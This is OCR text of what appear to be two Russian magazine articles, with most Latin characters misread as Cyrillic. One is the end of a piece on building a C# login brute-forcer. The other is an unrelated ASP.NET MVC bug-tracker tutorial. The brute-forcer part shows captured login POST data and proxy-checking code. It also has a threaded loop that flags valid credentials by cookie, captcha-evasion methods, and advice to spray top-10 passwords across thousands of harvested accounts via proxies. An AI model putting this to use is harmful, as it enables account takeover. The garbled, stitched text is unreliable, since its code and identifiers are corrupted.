Ассерс-Гапдцаде: гка-ВО, ки; а4=0.8, еп-05;4=0.5, еп; 4=0.3 


Соок1е: __СЕац19=<= = д = о ЕЕ; Юр зезз1опназн=чааннииня —— Решив; Юрю 1а35\у1310=22 ——— ЬЬ_1азтасс1у10у=0; 
ЬЬ изек1а=чи; рю раззчога=Чеиесннннн инс иииеый. ТО3зсаск=“ ЕЕ 
ОМТ: 1 
Соппесс1оп: Кеер-а11уе 
Таквыглядяткуки 
о —[—=[&=[=&=—==——__ 3 Е ит т 

=] Рагзег: РОЗТ НТТР/1.1 

жжет Нозс: == 
_ Равно | бек" "+Мит) Озек-Адепс: Мо2111а/5.0 (М1паомз МТ 5.1; ЕУ:23.0) бесКко/20100101 Е1кеЁох/23.0 
а Е НТТР и Ассерс: сехе/Вст1, арр11саз1оп/ хВси1+х11, арр11саб1оп/хи1; 4=0.9,*/*; ‹=0.8 
ыы мы - Ассерс-Гапацаде: ка-ВЧ, ка; <4=0.8, еп-0$;4=0.5, еп; 4=0.3 
Яр: п = Ассерс-Епсоа1п4: 921р, ЧеЕ1асе 
Верекег: Пеер:// === —= 
Епд оп: Г = Соок1е: а = ие ЕЕ. ен, Е == 
Соод:-0 ПмеТгеад5: 0 Соппесс1оп: Кеер-а11уе 
Вад:0 | >< | Сопсепс-Туре: арр11сас1оп/х-мыи-Еоки-иЕе 1епсоаеа 
а Сопсепс-ГепасВ: 46 
РР5:0 Снескеч: 0 х 
до эм | 5 | 
цзек изк=изегпаше &иазегк риуЯ=раззиогка&поае=1091п 
Г = ОНай юр Тез{Ргоху Тигпег: 0:0:0 Сеаг Азьо9 | СоруТех | ой — 
Роз (1 а "| "+Мате+") "+Рав5\+"| м зи ИИ 
_ 2? < + > Туре а зезтоНн тт 
СооКе("| ле (2) [= =) =) 


Интерфейс 


РОЗТ-запрос 
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и поэтому встраивают механизмы их проверки. 
Рассмотрим один из примеров такого кода. 


Ведачце${.Ргоху = 
Раг5е (ргоху); 
Кедие$* . бет ( "ПЕЕр: //5оо21е. сот"); 
гефиги гие; 
саеси { 

гефигп +а15$е; 


НЕЕрРгохуС1 тет . 


} 


К запросу прикрепляется прокси, и он пыта- 
ется сходить на дооде.сот. Если до него удает- 
ся достучаться, то возвращается гие, если нет, 
то возникает ошибка и программа вернет Та5е. 
Такой простой способ проверки может значитель- 
но повысить результативность работы программы 
с использованием публичных прокси-серверов. 


Брут 

Подготовительный этап пройден, хакер добыл все 
необходимое и переходит к написанию брута. За- 
дача программы — получить данные и произвести 
их проверку на удаленном сервере. Еще раз об- 
ратимся к картинке интерфейса, теперь в нем ис- 
пользуются левая и нижняя части окна. Здесь пе- 
речислены кнопки для загрузки логинов, паролей 
и прокси. Также справа от первых двух есть текст- 
боксы, их предназначение сводится к проверке 
одного логина на множество паролей и наоборот. 
В выпадающем списке справа от кнопки прокси 
хакер выбирает его тип или полностью отказы- 
вается от его использования, установив галочку 
напротив поля «Мо:». Рассмотрим один из вари- 
антов реализации кнопки загрузки данных: 


уаг орепй1е = пем ОрепЕ11е01а1о5(); 
1+ (орепйЯ1е.5ПомО1а108() == «= 
01а1о5Кези1*.0К) { 
С]оБа1 .Мате$ .С1еаг(); 
С1]оБа1 .Мате$ .АдаКапее ( Е11е. <= 
КеадА111.1пе$ (орепй1е.Е11еМате)); 
с]оБа1 .СоипЕМате$ = 61оБа1 .Мате$ . += 
Сочцит; 


Далее располагается окно статистики для вы- 
вода состояния работы программы, чуть ниже 
хакер устанавливает число рабочих потоков 
и, самое главное, вводит данные для РОЗТ- 
запроса. Получает он их все из тех же Вигр Зийе 
(ротзмлааег.пе игр) или плагинов для бра- 
узера. Основная сложность в подобных про- 


Пример 
используемой 
капчи 


са СОР и % а ТЕ 


вк 565? 11+ 


Сан гевб Фе 


857 8 


тех м Фе Бок 9’ 


САРТСНА: Той!) Нытзяз эта Согпрухе!з дрэм Амомию эПу 


АРТИ 4 зо 5 


Парсим, брутим, вспоминаем! 


граммах — правильное управление потоками, 
их остановка и повторный запуск в случае не- 
обходимости. Не рекомендуется использовать 
Абом, лучше выставлять флаг, который должен 
проверяться при запуске каждого потока, и если 
флаг выставлен, то он завершает свою работу (не 
мгновенно). Несмотря на то что такое «правопи- 
сание» явно на любителя, в хакерских кругах оно 
встречается довольно часто. 


НЕЕрКезропзе гезропзе = Кедие$* . += 

Роз (61оба1.Ро5{1, б]1оБа1.Ро$Е2 + += 

изегМате + @1оБа1.Ро${3 + изегРа$$м + ‹* 

6]1оБа1.Ро$*4.); 

1+ (гезропзе != пи11 && гезропзе. «= 

Соок1е5 .Сопфа1п$Кеу(61оБа1 .РозЕСоок1е)) { 
гефигп "Тгие"; 

} е15е { 
гефигп 


"Ра15е"; 


|} 


фог (11 1 = аезе; 1 < 61оБа1. 
бооЧМате .Соип®; 1++) { 
техЕВохЕе$*.ТпуоКке(пем АсТоп ( () 
{ ехЕВохфез*.Техе += @1оБа1 .+= 
бооЧМате1 Раз5мога: + « 
61оБа1.боо4Ра$$1 (_+ Епу1гоптейе . = 
МемЕ1пе; })); 
// Музыка на любителя :) 
Р1ауМи$1с ("Р1ау"); 


} 


// Присваиваем счетчику размер массива 
// вооаМате 
афез{ = 61оБа1.СбооЧМате .Сочпт*; 


В листинге выше программа выполняет за- 
прос с указанными ранее данными и в случае 
наличия требуемой куки в ответе записывает 
результат в Тгие. Ничего не напоминает? Это все 
тот же принцип «раз-два-три», не все хакеры лю- 
бят считать до четырех и более :). Следующий 
блок кода проверяет число поступивших на вход 
правильных комбинаций логин/пароль в массиве 
Аггау и, если их обнаруживает, выводит содержи- 
мое на центральную консоль. |пуоке используется 
для правильной работы, когда несколько потоков 
одновременно возвращают Тгие. 


САРТСНА 

Капча (САРТСНА, Сотрщеу Ащотаеа Рич Мс 
Тиипа 1е$1 {о 1е! Сотрщег$ апа Нитап$ Арам) — 
полностью автоматизированный публичный тест 
Тьюринга для различения компьютеров и людей. 


т07 


Иногда настолько сложный, что даже человек 
не может дать правильный ответ с первой по- 
пытки. Внедряется капча в формы авторизации, 
отправки сообщения и подобное, чем защищает 
информационный ресурс от спама и беспрепят- 
ственного перебора паролей. Капча огорчает 
хакеров, поэтому за годы ее существования они 
разработали следующие методы ее преодоления: 

. использование уязвимостей (поиск ошибок 
веб-программиста); 

. угадывание (авось повезет!); 

. использование баз данных (если капча гене- 
рировалась человеком, количество вариантов 
ограничено); 

. распознавание чужими руками (-0,0013 дол- 
лара за одну капчу); 

. автоматическое распознавание (использова- 
ние ОСВ — Ор#са! Спагамег Ресодп оп). 


Бывают еще и аудиокапчи, часть реализаций 
из которых вполне успешно «решили» исследова- 
тели из Стэнфордского университета, Тулейнско- 
го университета и французского института МЕРА, 
разработав систему аеСАРТСНА (Чесар{спа.пе\. 
С картинками работает Р\М\сва (саса.хоу.ога/ 
мик/Р\М/\ спа), один из самых популярных ресур- 
сов, и четыре проекта на СодеРгаес{ (можно на- 
гуглить самостоятельно). 

Некоторые хакеры приноровились использо- 
вать возможность подключать модули из программ 
распознавания текста (ЕтеВеааег) в свои проекты. 

Не всегда капча является проблемой — часто 
ее не требуется вводить при первой авторизации 
(социальные сети, почтовые сервисы), она акти- 
вируется только после неудачной попытки входа. 
Поэтому сейчас в моде проверять тысячи учетных 
записей (собранных парсером) на ТОР-10 паро- 
лей с использованием прокси. Таким образом 
хакер не встречает капчу и собирает урожай, при- 
ложив минимум усилий. 


ЗАКЛЮЧЕНИЕ 

В этой статье мы рассмотрели пример програм- 
мы для массового восстановления паролей своих 
друзей и просто знакомых (с их письменного со- 
гласия), реализованной на С#. Примечательная 
особенность разобранного примера вего универ- 
сальности, нет необходимости компилировать 
программу для каждого ресурса в отдельности. 
Следует также учитывать и что возможности ис- 
пользования подобных программ хакерами на- 
прямую зависят от настроек безопасности про- 
веряемого сервиса. —и= 
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НА АЗР.МЕТ 
МУС 


Игорь Антонов аКа $р!4ег МЕТ 
мг-опипе.ги, атопоу.1дог.КПу@дтай.сот 


Зря ты обходил стороной этот 
фреймворк! 


Технология АЗР.МЕТ уже давно перестала быть не- 
поворотливым монстром и уделом унылых корпора- 
тивных приложений. Заряженная М\С-фреймворком, 
платформа АЗР.МЕТ превращается в грозное оружие, 
нацеленное на хайлоад и действительно большие 
проекты. Нуа мы что? Мы в стороне не останемся. 
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ЧТО МНЕ ПОНРАВИЛОСЬ В А$ЗР.МЕТ МУ\УС 

Моя основная работа никогда не была напрямую связана с веб-разработкой. 

Все проекты создавались в свободное время и на технологиях, которые 

были мне симпатичны. Изначально я остановил выбор (как и многие) на РНР. 

Я долго на нем писал код, постоянно закрывая глаза на его странности 

и проблемы. Мне нравились многие РНР-фреймворки (Копапа, Соде!дпкКег, 

Ри@РНР и другие), ия с удовольствием применял их в своих проектах. Одна- 

ко, несмотря на плюсы и многообразие готовых каркасов, мне всегда хоте- 

лось переметнуться в другой лагерь и посмотреть, как происходит разработ- 
ка аналогичных вещей там. Сначала я присматривался к популярному ВиБу 

с его рельсами, но потом все же решил остановиться на .МЕТ. Перечислять 

плюсы данной платформы можно долго, но наиболее значимыми для меня 

все же стали: 

1. Надежность. Моя карьера разработчика началась с языка программиро- 
вания на Бер. Строгая типизация, ООП, компиляция — все эти вещи 
прочно укоренились в моей голове. Мне нравится, когда я могу пред- 
сказать результат выполнения кода, а если допущу ошибку, то меня под- 
страхует компилятор. Если код пахнет откровенной тухлятиной, то компи- 
лятор обязательно сообщит об этом и разработчик сможет предпринять 
необходимые действия. Разрабатывая приложение под АЗР.МЕТ, я по- 
падаю в ту же самую среду, где в моем распоряжении предсказуемый 
и строго типизированный язык (С#) с подушкой безопасности в лице 
компилятора. 

2. Инструменты. Миа! З1и4ю — прекрасная ШЕ, а вкупе с такими штуками, 
как ВеЗбпагрег, и вовсе превращается в настоящий комбайн для разра- 
ботчиков. Все необходимое собрано под одной оболочкой: полноценный 
отладчик, средства для рефакторинга, имейзепзе, оснастки для связи 
со вспомогательными технологиями и многое другое. Все компоненты 
работают шустро и мотивируют на плодотворную работу. 

3. Полная документация. Технические документы по технологиям М!сго5$оН 
оперативно обновляются и содержат массу полезной информации, начи- 
ная от теории и заканчивая полноценными примерами. Я уже не говорю 
о ежегодных подборках бесплатных тренингов в виде скринкастов и дру- 
гих плюшек вроде сильного и отзывчивого комьюнити. 

4. Производительность. Сравнивать производительность двух похожих тех- 
нологий всегда интересно, на зачастую такие сравнения не совсем объ- 
ективны. В больших проектах и при командной разработке АЗР.МЕТ по- 
казывает класс и оставляет далеко позади многих оппонентов. Скорость 
исполнения кода благодаря компиляции во многих случаях выше, чем 
в интерпретируемых языках. 

5. Безопасность. Не буду говорить, что это ключевое требование для каж- 
дого современного проекта. В АЗРМЕТ все нацелено на создание без- 
опасного кода. С одной стороны тебя страхует компилятор (от «детских 
болезней»), а с другой — всевозможные библиотеки и готовые механиз- 
мы (например, безопасная система аутентификации). 

6. Расширяемость. Когда выходишь за рамки типовых проектов, всегда 
возникает задача расширяемости. Если библиотека/технология не под- 
держивает возможность масштабирования, то нужно трижды подумать 
перед тем, как начать строить на ее основе долгоиграющий проект. Ре- 
ализация М\УС-фреймворка от М!сго5о{ достаточно хорошо продумана, 
и проблемы с наращиванием функционала вряд ли возникнут. Разработ- 
чик всегда может написать реализацию отдельного компонента системы, 
тем самым снабдив его необходимым функционалом. 

7. Хозяин своему коду. Я люблю полностью контролировать свой код, и мне 
дико не нравится, когда система генерит его без моего ведома. В класси- 
ческом АЗР МЕТ одной из проблем всегда была бесконтрольная верстка. 
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Бутстрапим тему 


Платформа так и норовила сформировать невалидный код разметки, ко- 
торый трудно переделать под себя. В АЗРМЕТ МУС такая проблема от- 
сутствует напрочь. Здесь программист сам командует парадом. 


МОБЕЕ\МЕМ/! СОМТВОЧЕВ 

На страницах нашего журнала я уже несколько раз рассматривал архитектур- 

ный паттерн М\УС (модель, представление, контроллер). В одном из номеров 

я даже приводил пример разработки простейшего М\УС-фреймворка на РНР 

Паттерн МУ\УС условно делит архитектуру приложения на три компонента: 

. модель (тоае!) — определяет основные сущности приложения. Звучит 
заумно, но под этой фразой всего лишь подразумеваются алгоритмы/ 
классы, необходимые для доступа к данным. Например, мы собираемся 
делать многопользовательское приложение. Класс, описывающий объект 
пользователя, будет моделью; 

. представление (мем) — визуализация моделей. На примере веб- 
приложений это будет НТМЕ-верстка; 

. контроллер (сотщгойег) — отвечает за обработку поступающих запросов. 


Главная цель МУС — обеспечить разделение ответственности между ос- 
новными компонентами приложения. Контроллер не должен знать нюансы 
формирования верстки или хранения данных в БД, он выполняет лишь роль 
проводника. Пользователь попросил, а контрол нашел правильный путь, 
не задумываясь о том, что там может произойти. 


БАГТРЕКЕР 

Типичный пример при знакомстве с подобными фреймворками — создание 
еще одного движка для блога. Я сначала хотел пойти тем же путем, но в итоге 
решил придумать более полезное приложение. Так родилась идея проверить 
фреймворк на создании проекта «Багтрекер». Такие приложения наиболее 
востребованы в компаниях, где более-менее налажен процесс разработки, 
и совсем скоро ты убедишься, что сотворить нечто подобное на АЗРМЕТ М\УС 
проще простого. 


СТОИТ ЛИ ИЗУЧАТЬ КЛАССИЧЕСКИЙ АЗРМЕТ? 


Простота ММС-фреймворка для АЗР.МЕТ может 
легко создать ошибочное мнение. Мол, к чему 
ЭТОТ «неповоротливый» АЗРМЕТ с его «стран- 
ной» разметкой, мне хватит и АЗРМЕТ М\УС. 
Однако не стоит забывать, что МУС — это всего 
лишь архитектурный паттерн и его можно реа- 
лизовать самостоятельно на любом языке. Тут 
ситуация аналогична миру РНР С момента по- 
явления М\УС-фреймворков язык получил вто- 
рое дыхание и сумел привлечь новых поклон- 
ников. Почему? Порог вхождения в и без того 


простой язык программирования снизился. 
Многие вещи стали доступны из коробки. 
В мире АЗРМЕТ произошла аналогичная ситуа- 
ция. МУС-фреймворк от Мего$оН существенно 
понизил барьер вхождения в технологию АЗР. 


МЕТ. Правда, это не говорит, что без фрейм- 
ворка платформа никуда не годится. Просто 
запомни, что он — это лишь очередной слой, 
скрывающий от твоего взора ряд нюансов 
классического АЗРМЕТ. Имея достаточный 
уровень подготовки, ты без проблем можешь 


сделать свою реализацию М\УС-фреймворка 
под платформу АЗР МЕТ. Он тоже сможет «в три 
пятнадцать» делать красивые урлы и осущест- 
влять контроль над генерируемой разметкой. 
К чему это я все говорю? А ктому, что техноло- 
гия АЗР МЕТ намного шире, чем просто АЗР.МЕТ 
МУС. Ее глубокому изучению однозначно стоит 
уделить время, и только тогда ты сможешь по- 
настоящему прочувствовать всю мощь плат- 
формы от Мсго$ой, которая так полюбилась 
в корпоративном сегменте. 


то Кодинг 


Теперь давай определимся с функционалом будущего про- 

екта. Будущий багтрекер должен: 

. отображать список тикетов с возможностью быстрой филь- 
трации по их состоянию (открыто/закрыто); 

. обладать простым интерфейсом, упрощающим процесс до- 
бавления задач в базу; 

. производить приятное впечатление на пользователя. 


С первыми двумя пунктами все ясно — немного кода на С#, 
и все готово, но как быть с интерфейсом? Мы воспользуемся 
фреймворком ТмЩег Вос гар (см. статью про него в 168-м 
номере нашего журнала), который позволит нам состряпать 
симпатичный интерфейс для приложения за несколько минут. 
Я не стану приводить портянку из пары десятков килобайт ша- 
блонного НТМ!-кода (тем более что там нет ничего необычно- 
го), а просто дам ссылку на заготовку: аоо.а/Хуийзтй. Качай 
и повторяй действия вместе со мной. 


ДЕЛАЕМ ПРОЕКТ 

У меня нет профессиональной версии студии, поэтому я вос- 
пользовался экспресс-версией редакции «Для \ммеб». Запускай 
студию и создавай новый проект «Веб-приложение АЗРМЕТ 4» 
с гордым названием ВидТгаскегРаХ. 

В окне мастера создания нового проекта тебе будет предло- 
жено выбрать шаблон для приложения. Шаблоны позволяют сразу же снаб- 
дить будущее творение определенным функционалом. Например, выбрав 
шаблон «Интернет-приложение», ты получишь заготовку с регистрационной 
формой и механизмом аутентификации. 

Для своего проекта мы выберем вариант «Простой». Такой проект не бу- 
дет включать в себя ничего лишнего, и это будет в самый раз для первого 
знакомства с миром АЗР МЕТ М\УС. В окне выбора шаблона для приложения 
также обрати внимание на пункт Мем/ Епате. Здесь выбирается шаблониза- 
тор для представлений. Тебе доступно два варианта: Вагог и АЗРХ. 

Во второй версии фреймворка М\УС в качестве шаблонизатора использо- 
вался АЗРХ, пришедший из классического АЗР. МЕТ. После РНР’ного много- 
образия движков для рендеринга представлений начинаешь испытывать 
приступы тошноты от его неуклюжести. Лучше сразу выбирать Вагог, мак- 
симально приближенный к аналогичным РНР-решениям (Зтацу, Т\ма и так 
далее). 

Больше никаких галок ставить не нужно, жми ОК, и студия сгенерирует 
болванку приложения. 


СТРУКТУРА МУС-ПРИЛОЖЕНИЯ 

Открой окно Зоийюоп Ехр!огег пошире и мотай на ус теорию. 

е Арр Оафа. После создания приложения эта директория пуста, но впо- 
следствии в ней будут храниться различные ресурсы приложения, такие 
как базы данных. 

е Арр _З{аг{. В директории принято хранить статичные классы, отвечающие 
за общую конфигурацию приложения. В предыдущих версиях фреймвор- 
ка классы, влияющие на конфигурацию приложения, описывались в еди- 
ном файле СоБа!.азах. Начиная с четвертой версии, принято их разде- 
лять на отдельные файлы и помещать в Арр_За[ с кодом инициализации 
в Сора|.азах. 

е® Сотмепт. Статичные ресурсы приложения. Сюда можно помещать изо- 
бражения, файлы стилей и много чего другого. 

® Соп\гоПег$. Из названия сразу понятно, что здесь должны храниться все 
контроллеры. 

е Мое. Содержит описание моделей приложения. 


Ва: 
а .’ Е * 
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— прекрасный цикл статей Андрея Черникова. В статьях рас- 
сматривается процесс создания полноценного сайта. Мануал больше ори- 
ентирован на читателей, имеющих опыт разработки на АЗР.МЕТ МУС. 

— книга «АЗР МЕТ МУСЗ Егатемогк с примерами на С# для 
профессионалов». Книга немного устарела (беда русских изданий), но все 
же до сих пор актуальна и новичкам будет в самый раз. 

— книга «АЗР.МЕТ М\УСА. Разработка реальных веб-приложений 
с помощью АЗР. МЕТ М\УС». В отличие от предыдущей рассматривается све- 
жая версия М\УС-фреймворка, но материал больше подойдет для тех, кто 
уже немного в теме. 

— на сайте представлено огромное количество докладов по 
технологиям и продуктам компании М!сго5оН. Рекомендую обратить вни- 
мание на тренинги по АЗР.МЕТ МУС от Гайдара Магданурова. 


® ЭсИрё$. Здесь должны находиться различные вспомогательные библи- 
отеки. Как правило, это уаиаЗсир{-тулзы вроде Апацщаг.$ или |Очегу. 
При создании приложения по шаблону «Простой» в эту папку автомати- 
чески добавляется ряд библиотек: |Очегу, |Очегу \, Кпоскощ, тодегпиг 
и другие. 

® \Ме\м/з. Название директории опять подсказывает тип содержимого. Все 
представления группируются по принадлежности к контроллерам. Напри- 
мер, все представления, относящиеся к контроллеру Ноте, будут разме- 
щаться по пути Ме\ми$/Ноте/. 

е СоБа!.азах — о предназначении этого файла я упоминал, когда расска- 
зывал про директорию Арр_Зац. Напоминаю еще раз: в файле определя- 
ется код инициализации проекта. 

е \Меб.сопНд — основной файл конфигурации приложения. Например, 
здесь описываются настройки соединения с СУБД; настройки вспомога- 
тельных компонентов (таких как ЕпЖу Егате\могК). 


ВЫЖИГАЕМ МОДЕЛИ 

Начинать разработку приложения будем с проектирования моделей. Для соз- 

дания багтрекера нам потребуется описать несколько моделей: 

. тикет (Пске) — сущность, характеризующая отдельную заявку (пост 
в багтрекер). Ряд полей этой модели будет ссылаться на другие модели; 

. статус (афи$) — статус выполнения заявки; 

. категория (Саедогу) — категория заявки; 

. пользователь (Ц$ег) — пользователь, оставивший тикет. 


Каждая модель в АЗР МЕТ М\УС фреймворке описывается в виде отдель- 
ного класса в папке Моде! (можно в любом месте). Добавление новых моде- 
лей выполняется в контекстном меню с помощью пункта Ада -> С!а$$. Создай 
все модели (см. соответствующие листинги) и возвращайся к тексту статьи. 


Листинг 1. Описание модели Сафезёогу 
риб11с с1аз5$ Сафегогу 


{ 
рчб11с 1пЕ Саферогута { веф; зеф; } 


Обозреватель решений 


 э-гоае 2 


Ц Яе-///Е-/Ргодес!5/С%23/ВидТгаскег/Верстка/саЫтей мт! 


/ Создать 


Дата Пользователь 


№ Список тикетов 


у Открытые тикеты 


Категория 


2013/07/01 Ае Соорег общие вопросы 


Ш Закрытые тикеты 


$ Профиль (Ае Соорег) 
@ Выйти 


Пример готовой верстки 


Заголовок 


Не работает принтер 


Обозреватель решений - поиск (СШ+ж) ?- 


#1 Решение "ВидТгаскегРогХ" (проектов: 1) 
я М] ВидТгаскегРогХ 
р / Ргорешез 
р „м ВеГегепсез 
м Арр_Баа 
р № Арр_бай 
р м Сомет 
в СопноНегх 
Статус вы Моде! 


р [>| 5епрб 


р м Мем 
р дл боБа![азах 

Я раскадез.сопйад 
р я МеБ.сопйд 


Открыто 


Обозреватель ре... Командный 0603... Обозреватель ба... 


Окно Зои оп Ехр!огег 
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Багтрекер на АЗР. МЕТ МУС 777 


СВУО-интерфейс в действии 


ричб11с $%г1п5 Т1е { реф; хеф; } 
и шшрЖ---------. 


Листинг 2. Описание модели $Тафи$ 
рчб11с с1аз$ $фафи$Моде1 


4 


руб11с 1пф{ 5фафи$Та { веф; хеф; 
риуб11с $%г1пё Т11е { деф; $хеф; 


не 


р, 


Листинг 3. Описание модели ТтсКее 
рчб11с с1аз$ Т1скее 


{ 


руб11с 1пф Таскеета { деф; хеф; } 
руб11с $%г1пё Т11е { веф; ет; } 
и611с $г1п Оезсг1рЕ1оп ее; 5еф; 
риб11с БафеТ1те Бафе { деф; $еф; } 
риб11с 11? Саферогута { веф; хеф; } 
руб11с \1гЕиа1 Сафевогу Сафевтогу { веф; зеф; } 
ручб11с 11? 5фафи$Т4 { реф; зеф; } 
ричб11с у1гфиа1 5фафи$ 5фафи$ { реф; зеф; } 
риб11с 11? Узегта { веф; зеф; } 
руб11с \1гЕиа1 Узег Узег { веф; зеф; } 


Листинг 4. Описание модели Узег 
рчб11с с1аз$ Узег 
ЕЕ Е 
риб11с 1пЕ ЧзегтТа { веф; хеф; } 
руб11с $%г1пв Е1г5Маме { веф; ет; } 
и611с $%&г1пв ГазМате её; зеф; 
руб11с $&г1пё Ета11 { веф; хеф; } 


|. 


ПОДКЛЮЧАЕМ ЕМТ1ТУЕВАМЕМ/ОВК 

Платформа .МЕТ предоставляет нам несколько способов доступа к данным. 
Мы воспользуемся наиболее актуальным из них — Епу РЕгатемогк. Помимо 
типичных задач, возлагаемых на ОАВМ (ОБес{ геайоп таррта) фреймворк, 
в ЕЕ реализована поддержка методики СоадеРиз+, позволяющая девелоперу 
на этапе разработки не задумываться о дизайне схемы БД. Достаточно лишь 
описать модели, а вопросы создания базы и таблиц на себя возьмет сам 
фреймворк. Нельзя сказать, что такая схема будет готова к использованию 
в продакшне, однако при разработке приложения с нуля этот подход позво- 
лит существенно сэкономить время. 

Чтобы воспользоваться плюсами этого фреймворка, нам необходимо под- 
ключить его к своему проекту. Проще всего это сделать при помощи консоли 
управления пакетами МиСет. Сразу после инсталляции \Мзиа! Зфиаю Тог \\Меб 
расширение Миде{ Раскаде Мападег недоступно. Его требуется установить 
самостоятельно, воспользовавшись пунктом ЕЖепзюп$ апа Чраае в меню 
Зегмсе. После установки запускай Миде Раскаде Мападег СопзоРе и вводи 
в ней команду для установки Ей Му Егатемогк: пУа!-Раскаде ЕпЖуРгатемогк. 

Установив Еп у Егатемогк, мы можем создать контекст данных для на- 
ших моделей и начать производить первые манипуляции с добавленными 


ь] 
(Г гиеюх > | — [5] ня 9 ВидТгаскегРогх - Месгозой Миа! Зи 2012 Ехрге$$ для М/еБ (Администратор) Г С+0 р. @х 
РР + ФАЙЛ ПРАВКА ВИД ПРОЕКТ ПОСТРОЕНИЕ ОТДАДКА КОМАНДА СЕРВИС ТЕСТ ОКНО СПРАВКА 
| Сгеже е- в -швыь 2. > бооде Спготе * Сео > М. 
« ,. 1юсаШо$:59534/сгид/Сгеа{е с ы <ооде р $ @®@ В- = абоЛискех [Конструктор] # Х Искесх Сайедогу.с$ НотебопгоНег.с$ Меб.сопй9 - 
чи - 8 
# + Обновить Файл скрипта: ФБоЛаЫе.2.591 
ри 
Е] 
Сгеа*е 2 Имя Тип данных Допустимы значения МИД По умолчанию 4 Клюци (1) 
® 
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Шаг приращения идентиф, 1 
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1 Соединение готово (1оса!ОВ)\м11.0 | 1арор\Яарюр | ЕАРКОЛЕСТ$\А$РАВУСТВА_. Командный 0... Обозревател... Обозревател... Свойства 


Дизайним схему таблицы 


в БД записями. Под страшным словом «контекст» подразумевается создание 
класса наследника от ОБСощеж (Зучет.Вата.Епт у), который свяжет модели 
с таблицами базы данных. Создавай новый класс для контекста данных в ди- 
ректории Моае![$ и переписывай в него код листинга 5. 


Листинг 5. Реализация класса контекста 
риб11с с1аз$5 ВиёТгаскегСопфехе : ОБбСоп%ех® 


4 
риб11с Об5ет<Саетогу> Сафевог1ез { веф; зеф; } 
риб11с Об5ее<$фафи$> 5фафизез { реф; зеф; } 
риб11с ОБъет<Т1скее> Т1скеф$ { реф; зеф; } 
риб11с 065$е*<Узег> Узег$ { веф; зеф; } 

|. 


После создания контекста мы можем воспользоваться технологией 
Соаде[!$+, то есть доверить ЕтЙуЕгатемогк создание таблиц и полей. В своем 
примерея воспользуюсь именно этим способом, поскольку статья не резино- 
вая и тратить время на описание процесса создания схемы БД нет смысла. 
К тому же ничто не мешает тебе самостоятельно создать БД и познакомиться 
с подходом ВааразеЕРи${ («сначала база, потом код»). 

В принципе, уже на данном этапе мы можем создать контроллер с пред- 
ставлениями, и ЕЁ любезно сгенерирует базу данных. Однако мы лучше сра- 
зу внесем неболышой твик в конфигурационный файл (\МеЬ.сопйд), тем са- 
мым принудительно задав имя базы. Найди в этом файле описание секции 
Соппесйоп ипо$з и удали из нее (если есть) все разделы. После добавь одну 
строку: 


‹а@Ч пате="ВиёТгаскегСопехе" соппес1оп5{г1пв="Бафа $оигсе=«- 

[оса10В)\\11.0; АЕТаси0)БЕ11епате=' |Бафа01гесфогу | \оигВазе. «= 
таЕ";ТифевгафеЯ 5$есиг1фу=Тгие" ргоу14егМате="5у{ет.ОБа{а. += 
59а1С11еп{" /> 


В этой строке я определил, что фреймворк должен использовать 
ВидТгаскегСощех{ для связи с БД, а саму базу будет хранить в файле ои!Вазе. 
паф, расположенном в директории данных (Арр_Ваа) проекта. 


|- — мы 
Создать проект =) Создаем новый 
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[С] Добавить в систему управления версиями 
Сож 
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СВУО-ПРИЛОЖЕНИЕ В ПАРУ КЛИКОВ 

Фактически наше приложение научилось работать с базой данных, но в реа- 
ле мы этого еще не увидели, поскольку ни разу не запускали наш багтрекер. 
Надо срочно исправлять положение дел, но у нас еще нет ни одного контрол- 
лера и представлений. Следовательно, запустив проект сейчас, хорошего мы 
ничего не увидим. Я предлагаю пока не заморачиваться на верстке представ- 
ления с подготовленным нами красивым интерфейсом. Лучше быстренько 
протестируем то, что есть. 

Создадим для этого простейший СВО (Сгезе геаа ираме аеще) функ- 
ционал без единой строчки кода. Перейди в Зо!ийоп Ехр/!огег и добавь в папку 
Соттойег$ новый контроллер с именем СгиаСотгопПег. В окне создания ново- 
го контроллера не торопись кликать на пимпу с кнопкой ОК. В выпадающем 
поле Тетр&{е выбери МУС сомго!ег мИИ геа4/ ме асНоп$ апа мем/з, изта 
Е Ку РЕгатемогк. После этого станут доступны поля для выбора классов, опи- 
сывающих модель и контекст данных. Выбирай Тске (в качестве модели) 
и ВидТгаскегСотехж{ (в качестве контекста). Остальные поля можешь оставить 
со значениями по умолчанию. 

Нажимай на ОК и восхищайся тем, как студия создала за нас код действий 
с необходимыми представлениями. Нам остается только запустить приложе- 
ние и проверить результат его выполнения. Сразу предупреждаю, после за- 
пуска ты увидишь не результат работы САЧЮО, а ошибку «Ресурс не найден». 
Мы не прописали маршрут по умолчанию, поэтому, чтобы добраться до сге- 
нерированного контроллера, тебе потребуется вбить в адресной строке 
полный путь к нему: ПЁр://Лосао${:53532/сгиа. Альтернативным решением 
будет внесение изменений в конфигурацию маршрута (файл РощеСопйд.с$): 


ефач1*$: пем { сопфго11ег = "сгиа", 
ас&1оп = "Тпаех", 
14 = Уг1Рагатетфег.Ор*1опа1 } 


В этой строке я устанавливаю, что контроллером по умолчанию явля- 
ется сгиа (а не Ноте, как было изначально). Внеся изменения в маршрут, 
перезапусти приложение, и ты сразу попадешь в сгенерированный СВИУО- 
интерфейс. 

Во время создания тикета ты увидишь, что фреймворк сгенерировал нам 
выпадающие списки для полей Саедогу, З1аи$ и Цзег, но в этих списках нет 
ни одного элемента для выбора. Чтобы в них что-то появилось, нам нужно до- 
бавить данные в соответствующие таблицы. Прерви выполнение аппликации 
и через окно Ваарбазе Ехр!огег открой соответствующие таблицы для внесе- 
ния данных. Я создал пару статусов в таблице З{а1изе$ и парочку разделов 
в Саедопе$, после этого выпадающие поля в представлении заполнились 
добавленными данными. 


КОНТРОЛЛЕРЫ 

СВУО-приложение получилось вполне рабочим, но для постоянного исполь- 
зования оно не годится. Уж больно «топорно» и нефункционально смотрится. 
У нас уже есть забутстрапенная заготовка верстки, и теперь остается ее на- 
тянуть на существующее приложение, а заодно познакомиться с самостоя- 
тельным созданием контроллеров и представлений. 

Добавь новый пустой контроллер к своему проекту и назови его 
НотеСопто!ег. \Мзиа! Зи4Чю сгенерирует каркас будущего контроллера 
и создаст действие шпаех. Это действие будет выполняться во время обраще- 
ния к имени контроллера. Например, чтобы обратиться к нашему контролле- 
ру Ноте, нам требуется перейти по адресу: ПИр:/ЛосатозИпоте. 

Пока ты переписываешь код контроллера, я расскажу тебе о реализации 
контроллеров в АЗРМЕТ М\УС. Как ты уже понял из листинга, контроллер — 
это не что иное, как обычный класс, унаследованный от ЗуЗет \ММеб.Мус. 
Соттго!ег. При создании нового контроллера ты должен следовать некоторым 
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соглашениям, главным из которых будет обязательное наличие постфикса 
